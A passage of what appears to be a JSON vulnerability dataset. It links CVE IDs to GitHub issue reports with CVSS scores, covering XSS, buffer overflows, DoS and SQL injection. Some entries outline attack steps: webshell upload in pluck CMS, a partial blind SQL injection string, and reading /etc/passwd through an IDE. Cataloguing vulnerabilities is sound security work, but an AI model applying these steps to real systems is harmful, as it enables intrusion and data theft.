c2 ( PATHTAG ) SUMMARY: APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s).",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-20756",
        "Issue_Url_old": "https://github.com/modxcms/revolution/issues/14105",
        "Issue_Url_new": "https://github.com/modxcms/revolution/issues/14105",
        "Repo_new": "modxcms/revolution",
        "Issue_Created_At": "2018-10-02T04:21:54Z",
        "description": "Stored XSS via document resources. Create new document with pagetitle ERRORTAG XSS work in: Update Quick edit View manager logs",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-20847",
        "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/431",
        "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/431",
        "Repo_new": "uclouvain/openjpeg",
        "Issue_Created_At": "2014-11-14T19:45:14Z",
        "description": "Heap buffer overflow in opj_tcd_init_decode_tile. Originally reported on Google Code with ID NUMBERTAG ERRORTAG Reported by mayeut URLTAG on NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-3769",
        "Issue_Url_old": "https://github.com/ruby-grape/grape/issues/1762",
        "Issue_Url_new": "https://github.com/ruby-grape/grape/issues/1762",
        "Repo_new": "ruby-grape/grape",
        "Issue_Created_At": "2018-05-22T22:25:38Z",
        "description": "Default formatter error can cause XSS rendering issue. If you issue a request into an API endpoint with a format specified that is not handled, you get back a NUMBERTAG error with message APITAG requested format 'format' is not supported.' The name of the specified format is rendered in the error message, which defaults as HTML. You can easily craft a format value that gets passed in and renders as an XSS. An example: URLTAG Renders as html: The requested format APITAG APITAG ' is not supported. Which will cause a javascript popup if you visit this page in a browser.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-6013",
        "Issue_Url_old": "https://github.com/bigtreecms/BigTree-CMS/issues/327",
        "Issue_Url_new": "https://github.com/bigtreecms/bigtree-cms/issues/327",
        "Repo_new": "bigtreecms/bigtree-cms",
        "Issue_Created_At": "2018-01-22T13:47:05Z",
        "description": "Cross site Scripting in bigtreecms NUMBERTAG FILE: PATHTAG Vul Code: $parts = APITAG > APITAG = $part; > $directory = APITAG > APITAG APITAG APITAG APITAG POST PATHTAG xxx: xxx xxx: xxx xxx: xxx APITAG APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2018-6535",
        "Issue_Url_old": "https://github.com/Icinga/icinga2/issues/4920",
        "Issue_Url_new": "https://github.com/icinga/icinga2/issues/4920",
        "Repo_new": "icinga/icinga2",
        "Issue_Created_At": "2017-01-13T08:55:05Z",
        "description": "APITAG NUMBERTAG Hash API password and use time constant password compares. This issue has been migrated from Redmine: URLTAG Created by jflach on NUMBERTAG Assignee: _jflach_ Status: APITAG Target Version: _(none)_ Last Update NUMBERTAG in Redmine)_ Backport?: Not yet backported Include in Changelog NUMBERTAG API user credentials are compared using the != operator on APITAG which maps directly to the != operator of std::string which is not guaranteed to be constant time and thus is likely vulnerable to timing attacks. An alternative to making the comparision time constant would be always save the API passwords hashed.",
        "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.9,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2018-9058",
        "Issue_Url_old": "https://github.com/ckolivas/lrzip/issues/93",
        "Issue_Url_new": "https://github.com/ckolivas/lrzip/issues/93",
        "Repo_new": "ckolivas/lrzip",
        "Issue_Created_At": "2018-03-27T03:22:20Z",
        "description": "infinite loop in runzip_fd (src/runzip.c). On latest version APITAG and commit APITAG of lrzip, there is an infinite loop in runzip_fd function of src/runzip.c, which could be triggered by the POC below. The issue happens since the return value of runzip_chunk (line NUMBERTAG function could be manipulated to be NUMBERTAG In this case, total is always smaller than expected_size NUMBERTAG i NUMBERTAG runzip_fd(rzip_control control, int fd_in, int fd_out, int fd_hist, i NUMBERTAG expected_size NUMBERTAG do NUMBERTAG u = runzip_chunk(control, fd_in, expected_size, total NUMBERTAG total += u NUMBERTAG while (total APITAG eof NUMBERTAG return total NUMBERTAG To reproduce the issue, run: ./lrzip t $POC FILETAG The full stack trace is NUMBERTAG fe NUMBERTAG fb NUMBERTAG in _fxstat () from APITAG NUMBERTAG ae NUMBERTAG in fstat (__statbuf NUMBERTAG fffffffd2a0, __fd NUMBERTAG at PATHTAG NUMBERTAG runzip_chunk (tally NUMBERTAG expected_size=<optimized out>, fd_in=<optimized out>, control=<optimized out>) at PATHTAG NUMBERTAG runzip_fd APITAG APITAG , fd_in=fd_in APITAG fd_out=fd_out APITAG fd_hist=fd_hist APITAG expected_size=<optimized out>) at PATHTAG NUMBERTAG in decompress_file (control NUMBERTAG b4cc0 APITAG ) at PATHTAG NUMBERTAG in main (argc=<optimized out>, argv=<optimized out>) at PATHTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-9133",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1072",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1072",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2018-03-29T21:02:01Z",
        "description": "Excessive iteration in APITAG and APITAG ( PATHTAG ). Version: APITAG NUMBERTAG Q NUMBERTAG Commit: APITAG OS: Linux test NUMBERTAG APITAG NUMBERTAG SMP Fri Feb NUMBERTAG UTC NUMBERTAG APITAG There is a excessive iteration in APITAG and APITAG function of PATHTAG file, which could be triggered by the POC below. The issue happens since APITAG and APITAG assume legitimate values of image >rows and image >columns. Once such values are manipulated to be large, imagemagick hangs: Imagemagick spends more than ten minutes to process the POC, which is only NUMBERTAG bytes. To reproduce the issue: run ./mogrify $POC POC is attached. FILETAG Stack trace when imagemagick is in APITAG loop NUMBERTAG fe NUMBERTAG f6ebac in APITAG APITAG APITAG at PATHTAG NUMBERTAG fe NUMBERTAG f NUMBERTAG in APITAG (image_info=<optimized out>, exception=<optimized out>) at PATHTAG NUMBERTAG fe NUMBERTAG c in APITAG APITAG APITAG at PATHTAG NUMBERTAG fe NUMBERTAG e5 in APITAG APITAG APITAG PATHTAG APITAG at PATHTAG NUMBERTAG fe NUMBERTAG a1dd6e in APITAG (image_info NUMBERTAG argc=<optimized out>, argv=<optimized out>, APITAG out>, exception=<optimized out>) at PATHTAG NUMBERTAG fe NUMBERTAG ea NUMBERTAG in APITAG APITAG command=<optimized out>, argc=argc APITAG argv=<optimized out>, metadata=<optimized out>, APITAG at PATHTAG NUMBERTAG in APITAG (argc NUMBERTAG argv=<optimized out>) at PATHTAG NUMBERTAG fe NUMBERTAG f8c2c NUMBERTAG in __libc_start_main () at PATHTAG NUMBERTAG ac2 in _start ()",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-9918",
        "Issue_Url_old": "https://github.com/qpdf/qpdf/issues/202",
        "Issue_Url_new": "https://github.com/qpdf/qpdf/issues/202",
        "Repo_new": "qpdf/qpdf",
        "Issue_Created_At": "2018-04-10T10:00:25Z",
        "description": "Segmentation Fault (stack overflow) on a crafted PDF file. A crafted pdf file causes a segmentation fault, stack overflow reported by LLVM APITAG causing a denial of service and there is a chance of code execution. FILETAG Details are attached inside the zip called 'gdb log'. I have tested with libqpdf and qpdf itself, debugged and used LLVM APITAG to identify the possible root cause. A pdf POC is inside the zip. Versions tested NUMBERTAG and NUMBERTAG c code to test: APITAG running: > == simple source code using libqpdf == > $ cat openpdf.cc > include APITAG > include APITAG > include APITAG > include APITAG > include APITAG > include APITAG > > int main(void) > { > int pageno NUMBERTAG try > { > QPDF pdf; > APITAG FILETAG \"); > APITAG pages = APITAG > if ((pageno NUMBERTAG static_cast APITAG (pageno) > APITAG > { > exit NUMBERTAG catch (std::exception& e) > { > return NUMBERTAG return NUMBERTAG clang NUMBERTAG PATHTAG lz ljpeg lqpdf lpthread .cc g o openpdf > $ ./openpdf > WARNING: FILETAG (trailer, offset NUMBERTAG expected dictionary key but found non name object; inserting key APITAG > WARNING: FILETAG (trailer, offset NUMBERTAG expected dictionary key but found non name object; inserting key APITAG > WARNING: FILETAG (trailer, offset NUMBERTAG expected dictionary key but found non name object; inserting key APITAG > (...) > WARNING: FILETAG (trailer, offset NUMBERTAG unknown token while reading object; treating as string > WARNING: FILETAG (trailer, offset NUMBERTAG unexpected EOF > WARNING: FILETAG (trailer, offset NUMBERTAG parse error while reading object > Segmentation fault (core dumped) Testing qpdf NUMBERTAG pushdword MENTIONTAG qpdflib]$ qpdf FILETAG test.pdf > Segmentation fault (core dumped) > [pushdword MENTIONTAG qpdflib]$ qpdf version > qpdf version NUMBERTAG Copyright (c NUMBERTAG Jay Berkenbilt > This software may be distributed under the terms of version NUMBERTAG of the > Artistic License which may be found in the source distribution. It is > provided \"as is\" without express or implied warranty. testing qpdf NUMBERTAG qpdf FILETAG test.pdf > WARNING: FILETAG (trailer, offset NUMBERTAG expected dictionary key but found non name object; inserting key APITAG > WARNING: FILETAG (trailer, offset NUMBERTAG expected dictionary key but found non name object; inserting key APITAG > WARNING: FILETAG (trailer, offset NUMBERTAG expected dictionary key but found non name object; inserting key APITAG > WARNING: FILETAG (trailer, offset NUMBERTAG expected dictionary key but found non name object; inserting key APITAG > (... a very long warning repetition ...) > WARNING: FILETAG (trailer, offset NUMBERTAG expected dictionary key but found non name object; inserting key APITAG > WARNING: FILETAG (trailer, offset NUMBERTAG unknown token while reading object; treating as string > WARNING: FILETAG (trailer, offset NUMBERTAG unexpected EOF > WARNING: fuzzed.pdf (trailer, offset NUMBERTAG parse error while reading object > Segmentation fault (core dumped)",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-10062",
        "Issue_Url_old": "https://github.com/aurelia/framework/issues/992",
        "Issue_Url_new": "https://github.com/aurelia/framework/issues/992",
        "Repo_new": "aurelia/framework",
        "Issue_Created_At": "2022-03-01T14:53:13Z",
        "description": "npm audit warning for aurelia framework XSS vulnerability in default HTML sanitizer implementation. I'm submitting a security vulnerability audit report Library Version: aurelia framework NUMBERTAG Please tell us about your environment: Operating System: Windows NUMBERTAG N/A) Node Version NUMBERTAG LTS) NPM Version NUMBERTAG LTS) Aurelia CLI OR JSPM OR Webpack AND Version N/A Browser: N/A Language: all Current behavior: When installing Aurelia NUMBERTAG APITAG ) using npm , audit warnings are displayed, with reference to this vulnerability description URLTAG . The Aurelia products developed by my company are not really affected since we have implemented our own improved Aurelia APITAG package (stored on our internal npm repository). We use this as replacement for the default, limited sanitizer implementation included with APITAG (as recommended in your documentation pages). Our sanitizer package is a pure ESM package that works both in browser AND node (using jsdom ) environments, and it is configurable by \"allow listing\" html element names/attributes per element type, and also inline CSS style properties... CODETAG If it is of interest, I could ask if it is OK to make the source code for our sanitizer package public, so that you could review/test it. Then we could discuss making the package public, or if you prefer dissecting the code to make it an integral part of the aurelia framework source code, we could maybe \"donate\" the code for this purpose as well. I would need some confirmations from management first though. Whatever you prefer, I think something should be done to get rid of the vulnerability audit warnings. Awaiting reply. Expected/desired behavior: Aurelia NUMBERTAG should mitigate the vulnerability by including a better html sanitization feature to get rid of audit warnings when installed from npm repository.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-1010069",
        "Issue_Url_old": "https://github.com/leesavide/abcm2ps/issues/18",
        "Issue_Url_new": "https://github.com/lewdlime/abcm2ps/issues/18",
        "Repo_new": "lewdlime/abcm2ps",
        "Issue_Created_At": "2018-04-13T18:42:10Z",
        "description": "access violation APITAG in txt_add(unsigned char s, int sz). URLTAG (gdb) set args POC4 (gdb) r abcm2ps NUMBERTAG File POC4 Line NUMBERTAG Empty line in tune header K:C added Program received signal SIGSEGV, Segmentation fault. __memcpy_avx_unaligned () at PATHTAG NUMBERTAG PATHTAG No such file or directory. (gdb) bt NUMBERTAG ffff NUMBERTAG d NUMBERTAG e3 in __memcpy_avx_unaligned () at PATHTAG NUMBERTAG e1b5b in txt_add (__len NUMBERTAG src NUMBERTAG f3e, __dest=<optimized out>) at PATHTAG NUMBERTAG e1b5b in txt_add (s NUMBERTAG f3e \"\", sz NUMBERTAG at APITAG NUMBERTAG e NUMBERTAG a in frontend (s=<optimized out>, s APITAG PATHTAG PATHTAG PATHTAG OB NUMBERTAG W PATHTAG PATHTAG \", ftype=ftype APITAG fname=fname APITAG \"POC4\", linenum NUMBERTAG linenum APITAG at APITAG NUMBERTAG b NUMBERTAG d in treat_file (fn=<optimized out>, ext=<optimized out>) at APITAG NUMBERTAG f9 in main (argc NUMBERTAG argv=<optimized out>) at APITAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-10152",
        "Issue_Url_old": "https://github.com/containers/libpod/issues/3211",
        "Issue_Url_new": "https://github.com/containers/podman/issues/3211",
        "Repo_new": "containers/podman",
        "Issue_Created_At": "2019-05-28T15:33:18Z",
        "description": "Podman cp dereferences symlinks in host context. Is this a BUG REPORT or FEATURE REQUEST? (leave only one on its own line) /kind bug Description When copying into a path in a container that contains a symlink, the symlink is resolved on the host, not within the container, Steps to reproduce the issue NUMBERTAG APITAG NUMBERTAG Inside the container: APITAG NUMBERTAG Outside the container: APITAG NUMBERTAG In the container, APITAG NUMBERTAG Outside the container, APITAG Describe the results you received: Testfile is created outside the container Describe the results you expected: Testfile is created inside the container Additional information you deem important (e.g. issue happens only occasionally): Output of podman version : Latest master",
        "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.8,
        "exploitabilityScore": 0.8
    },
    {
        "CVE_ID": "CVE-2019-10742",
        "Issue_Url_old": "https://github.com/axios/axios/issues/1098",
        "Issue_Url_new": "https://github.com/axios/axios/issues/1098",
        "Repo_new": "axios/axios",
        "Issue_Created_At": "2017-09-22T06:34:42Z",
        "description": "Download continues after APITAG exceeded. \u00a0Summary The following code demonstrates the issue: CODETAG Expected behavior: The script exits immediately after printing ERRORTAG APITAG size of NUMBERTAG exceeded\" Not much more than NUMBERTAG KB was downloaded from the server Actual behavior: The script prints ERRORTAG APITAG size of NUMBERTAG exceeded\", then continues to download the remaining NUMBERTAG MB of data from the server. It takes about two minutes before it exits on my connection. It's possible to work around this by adding a cancellation token and manually canceling the request when an error is encountered. However, since the request never actually fires a \"complete\" event, it's surprising that the download continues, only to have the data be thrown into the void. \u00a0Context axios version NUMBERTAG Environment: node NUMBERTAG APITAG Sierra NUMBERTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-11084",
        "Issue_Url_old": "https://github.com/gbraad/gauth/issues/110",
        "Issue_Url_new": "https://github.com/gbraad/gauth/issues/110",
        "Repo_new": "gbraad/gauth",
        "Issue_Created_At": "2018-08-22T08:21:45Z",
        "description": "Self XSS. Minor security niggle but the name field is vulnerable to self XSS. No validation or escaping, so now the hosted copy plays me the Harlem Shake whenever I visit your site. This could be used by someone who obtains physical access to a machine, or malicious browser extension, to gain persistent access to users's TOTP codes. Indeed it could easily be scripted to immediately exfiltrate any new codes stored. Alternative, perhaps more plausible scenario is offering TOTP and providing a APITAG button to encourage them to copy the site name, and polluting the content of the copy and paste buffer with the attack code e.g. \" EMAILTAG xample.com APITAG \" The name should be properly escaped on output. Consider restricting the set of valid characters in the name. Consider using a Content Security Policy on the hosted copy to mitigate (and potentially detect via reporturi) existing and unforeseen XSS issues.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-11344",
        "Issue_Url_old": "https://github.com/pluck-cms/pluck/issues/72",
        "Issue_Url_new": "https://github.com/pluck-cms/pluck/issues/72",
        "Repo_new": "pluck-cms/pluck",
        "Issue_Created_At": "2019-04-09T14:45:54Z",
        "description": "file upload vulnerability in PATHTAG Location: URLTAG Code: ERRORTAG When the uploaded file hits the suffix in APITAG , the file will be renamed to APITAG , and missed APITAG will not be renamed. So you can upload a webshell by overriding the APITAG file. Step1. Upload a file APITAG File content: image URLTAG Step2. Upload file APITAG File content: image URLTAG Step3. Request getshell URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-11470",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1472",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1472",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2019-02-05T04:29:35Z",
        "description": "Incorrect parsing Cineon causing convert to take ridiculous time. Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description Cineon image may be mistakenly parsed with incorrect pixel information, causing converting to take too much CPU resource. Steps to Reproduce convert c.cin /tmp/test.tmp ERRORTAG FILETAG System Configuration APITAG version NUMBERTAG Q NUMBERTAG b3bdb NUMBERTAG b) Environment APITAG system, version and so on): Ubuntu NUMBERTAG Additional information: Version NUMBERTAG Q NUMBERTAG seems fine with error message \"width or height exceeds limit `c.cin'\". APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-13038",
        "Issue_Url_old": "https://github.com/Uninett/mod_auth_mellon/issues/35",
        "Issue_Url_new": "https://github.com/uninett/mod_auth_mellon/issues/35",
        "Repo_new": "uninett/mod_auth_mellon",
        "Issue_Created_At": "2015-05-15T18:06:24Z",
        "description": "Open Redirection issue. Hello, In IDP initiated login for Mellon, APITAG parameter could be really anything and that gets added as APITAG Once assertion is consumed, mellon redirects to APITAG arbitrarily. This leads to Open Redirect security issue. Ideally, redirection code should check if its in same domain. Can this be tracked? For example, URLTAG to IDP> Will redirect to Google after successful assertion. This would also lead to Phishing kind of attack.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-13617",
        "Issue_Url_old": "https://github.com/nginx/njs/issues/174",
        "Issue_Url_new": "https://github.com/nginx/njs/issues/174",
        "Repo_new": "nginx/njs",
        "Issue_Created_At": "2019-06-03T14:46:39Z",
        "description": "heap buffer overflow in APITAG Hello, I am shuoz of alpha lab of topsec. I fuzz njs and found a heap overflow bug. ./njs FILETAG ERRORTAG pocfile: FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-13915",
        "Issue_Url_old": "https://github.com/b3log/wide/issues/355",
        "Issue_Url_new": "https://github.com/b3log/wide/issues/355",
        "Repo_new": "b3log/wide",
        "Issue_Created_At": "2019-05-15T15:44:13Z",
        "description": "Vulnerability: read and write to any file. \u63cf\u8ff0\u95ee\u9898 Sensitive system files can be read through code or soft links. \u91cd\u73b0\u6b65\u9aa4 Method NUMBERTAG by code NUMBERTAG Writing code in the editor to read any file, such as /etc/passwd NUMBERTAG Click the green button at the top to compile and run about three times (I don't know why three NUMBERTAG etc/passwd will be read out Method NUMBERTAG by git or compressed file NUMBERTAG Create a soft link to a sensitive file, such as /etc/passwd, on a Linux APITAG NUMBERTAG compress the soft link APITAG NUMBERTAG upload zip and unzip it. when you open a link file, the local file that you point to is opened NUMBERTAG change and save the file if the user running wide has permission \u671f\u5f85\u7684\u7ed3\u679c Sensitive system files should not be read. \u622a\u5c4f\u6216\u5f55\u50cf FILETAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-13984",
        "Issue_Url_old": "https://github.com/directus/api/issues/981",
        "Issue_Url_new": "https://github.com/directus/v8-archive/issues/981",
        "Repo_new": "directus/v8-archive",
        "Issue_Created_At": "2019-05-28T20:28:44Z",
        "description": "FILETAG A malicious user can use this functionality in order to upload a malicious file and to send it by a legitimate link to other victims and to attack them using their trust to the system. It was also found that file size limitations are permit to users upload large size files APITAG NUMBERTAG MB) in cases even when a size of uploaded file not required to be large as for example image for the user\u2019s avatar. FILETAG What problem does this feature solve? Fixes security hole. How do you think this should be implemented? Do now allow any access to uploaded files without any authentication. Restrict file extensions using whitelist approach. The file types allowed to be uploaded should be restricted to only those that are necessary for business functionality. The application should perform filtering and content checking on any files which are uploaded to the server. Files should be thoroughly scanned and validated before being made available to other users. Limit the file size to a reasonable maximum value in order to prevent denial of service attacks (on file space or other web application\u2019s functions such as the image resizer). Use a virus scanner on the server (if it is applicable). Or, if the contents of files are not confidential, a free virus scanner website can be used. In this case, file should be stored with a random name and without any extension on the server first, and after the virus checking (uploading to a free virus scanner website and getting back the result), it can be renamed to its specific name and extension. Implement an authorization mechanism that validate if user authorized to view or download the specific file. Would you be willing to work on this? Maybe, with help/guidance from Directus team.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-15047",
        "Issue_Url_old": "https://github.com/axiomatic-systems/bento4/issues/408",
        "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/408",
        "Repo_new": "axiomatic-systems/bento4",
        "Issue_Created_At": "2019-07-19T06:39:22Z",
        "description": "2 Potential Buffer Overflow Vulnerabilities. bento4 version bento NUMBERTAG description APITAG download link FILETAG others please send email to EMAILTAG if you have any questions. APITAG EMAILTAG pp NUMBERTAG heap buffer overflow description An issue was discovered in bento NUMBERTAG There is a/an heap buffer overflow in function APITAG at APITAG NUMBERTAG commandline mp NUMBERTAG aac APITAG a.aac source CODETAG bug report ERRORTAG others from fuzz project pwd bento4 mp NUMBERTAG aac NUMBERTAG crash name APITAG EMAILTAG pp NUMBERTAG heap buffer overflow Auto generated by pyspider at NUMBERTAG please send email to EMAILTAG if you have any questions. input input URLTAG APITAG EMAILTAG pp NUMBERTAG heap buffer overflow description An issue was discovered in bento NUMBERTAG There is a/an heap buffer overflow in function APITAG at APITAG NUMBERTAG commandline mp NUMBERTAG aac APITAG a.aac source CODETAG bug report ERRORTAG others from fuzz project pwd bento4 mp NUMBERTAG aac NUMBERTAG crash name APITAG EMAILTAG pp NUMBERTAG heap buffer overflow Auto generated by pyspider at NUMBERTAG please send email to EMAILTAG if you have any questions. input input URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-15048",
        "Issue_Url_old": "https://github.com/axiomatic-systems/bento4/issues/409",
        "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/409",
        "Repo_new": "axiomatic-systems/bento4",
        "Issue_Created_At": "2019-07-31T05:24:56Z",
        "description": "3 potential vulerabilities. bento4 version bento NUMBERTAG description txt None download link FILETAG others please send email to EMAILTAG if you have any questions. APITAG EMAILTAG pp NUMBERTAG heap buffer overflow description An issue was discovered in bento NUMBERTAG There is a/an heap buffer overflow in function APITAG at APITAG NUMBERTAG commandline mp4compact APITAG a.mp4 source ERRORTAG bug report ERRORTAG others from fuzz project pwd bento4 mp4compact NUMBERTAG crash name APITAG EMAILTAG pp NUMBERTAG heap buffer overflow Auto generated by pyspider at NUMBERTAG please send email to EMAILTAG if you have any questions. input input URLTAG APITAG EMAILTAG pp NUMBERTAG heap buffer overflow description An issue was discovered in bento NUMBERTAG There is a/an heap buffer overflow in function APITAG at APITAG NUMBERTAG commandline mp4compact verbose APITAG a.mp4 source CODETAG bug report ERRORTAG others from fuzz project pwd bento4 mp4compact NUMBERTAG crash name APITAG EMAILTAG pp NUMBERTAG heap buffer overflow Auto generated by pyspider at NUMBERTAG please send email to EMAILTAG if you have any questions. input input URLTAG APITAG EMAILTAG pp NUMBERTAG heap buffer overflow description An issue was discovered in bento NUMBERTAG There is a/an heap buffer overflow in function APITAG at APITAG NUMBERTAG commandline mp4compact verbose APITAG a.mp4 source ERRORTAG bug report ERRORTAG others from fuzz project pwd bento4 mp4compact NUMBERTAG crash name APITAG EMAILTAG pp NUMBERTAG heap buffer overflow Auto generated by pyspider at NUMBERTAG please send email to EMAILTAG if you have any questions. input input URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-15562",
        "Issue_Url_old": "https://github.com/go-gorm/gorm/issues/2517",
        "Issue_Url_new": "https://github.com/go-gorm/gorm/issues/2517",
        "Repo_new": "go-gorm/gorm",
        "Issue_Created_At": "2019-06-21T08:54:24Z",
        "description": "SQL injection in Gorm With using first and find.. What version of Go are you using ( go version )? latest Which database and its version are you using? postgress latest and gorm latest Blind Sql injection localhost NUMBERTAG user?id=id NUMBERTAG or NUMBERTAG ERRORTAG Need to runnable with FILETAG or please provides your config. ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-15939",
        "Issue_Url_old": "https://github.com/OpenCV/opencv/issues/15287",
        "Issue_Url_new": "https://github.com/opencv/opencv/issues/15287",
        "Repo_new": "opencv/opencv",
        "Issue_Created_At": "2019-08-13T07:02:59Z",
        "description": "Floating Point Exception in APITAG APITAG System information (version) APITAG NUMBERTAG Operating System / Platform => Windows NUMBERTAG Bit Compiler => Visual Studio NUMBERTAG APITAG NUMBERTAG Operating System / Platform => Ubuntu NUMBERTAG LTS Compiler NUMBERTAG Detailed description An issue was discovered in openc NUMBERTAG There is a FPE in APITAG DEBUG CODETAG ASAN report ERRORTAG Steps to reproduce APITAG APITAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.9,
        "impactScore": 3.6,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2019-16511",
        "Issue_Url_old": "https://github.com/wixtoolset/issues/issues/6075",
        "Issue_Url_new": "https://github.com/wixtoolset/issues/issues/6075",
        "Repo_new": "wixtoolset/issues",
        "Issue_Created_At": "2019-09-12T18:10:14Z",
